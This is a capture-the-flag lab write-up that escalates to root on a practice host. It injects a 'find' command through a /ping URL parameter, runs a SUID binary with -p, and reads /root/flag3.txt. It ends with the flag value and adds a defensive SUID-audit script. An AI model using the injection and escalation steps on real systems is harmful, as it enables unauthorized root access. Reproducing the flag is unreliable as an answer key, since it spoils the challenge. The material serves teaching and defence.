The Iron Shell - TOKEN3

Base URL: http://target:8000

Background

A misconfigured SUID binary (/usr/local/bin/rootme) allows privilege escalation to root.

From Nothing to Working

Start point: you have user-level access after cracking SSH credentials.

Iterations:

  1. From the /ping injection, run find / -perm -4000 -type f to list SUID binaries.
  2. Notice /usr/local/bin/rootme is SUID root.
  3. Execute rootme with preserved privileges (-p) to obtain a root shell.
  4. Read the root flag and capture the token.

Goal

Gain root access and retrieve the root flag.

Commands

Find SUID targets (from the web injection):

curl -s "http://target:8000/ping?ip=127.0.0.1;find+/+-perm+-4000+-type+f"

Escalate after SSH login:

ssh user@target
/usr/local/bin/rootme -p
cat /root/flag3.txt
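
The same find check from step 1, run as a defender-side audit that flags SUID files missing from a known-good baseline. This is an added example, not part of the original write-up; the allowlist is a constructed sample and audit_suid is a hypothetical helper name.

```shell
#!/bin/sh
# Added example: flag SUID files that are not in an expected baseline.

# Constructed sample baseline. A real one should be generated from the
# distribution's package manifest for the specific host image.
SUID_ALLOWLIST="/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd"

# audit_suid ROOT [ALLOWLIST]
#   ROOT       directory to scan (default: /)
#   ALLOWLIST  newline-separated absolute paths (default: SUID_ALLOWLIST)
# Prints each SUID regular file under ROOT that is not in the allowlist.
# Returns 1 if at least one unexpected file was found, 0 otherwise.
audit_suid() {
    root=${1:-/}
    allow=${2:-$SUID_ALLOWLIST}
    # Same predicate as the write-up's enumeration: -perm -4000 -type f.
    unexpected=$(find "$root" -perm -4000 -type f 2>/dev/null |
        while IFS= read -r f; do
            # -F fixed string, -x whole-line match: no partial path matches.
            printf '%s\n' "$allow" | grep -Fxq -- "$f" || printf '%s\n' "$f"
        done)
    [ -z "$unexpected" ] && return 0
    printf '%s\n' "$unexpected"
    return 1
}

# Usage (e.g. from cron or a CI image check):
#   audit_suid / || echo "unexpected SUID files found" >&2
```

On the host described here, /usr/local/bin/rootme would be reported because it is not in the baseline; the fix is to remove the SUID bit (chmod u-s) or the binary itself.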

Expected Output

Look for:

PCCC{flag3_41_6572}

Learn More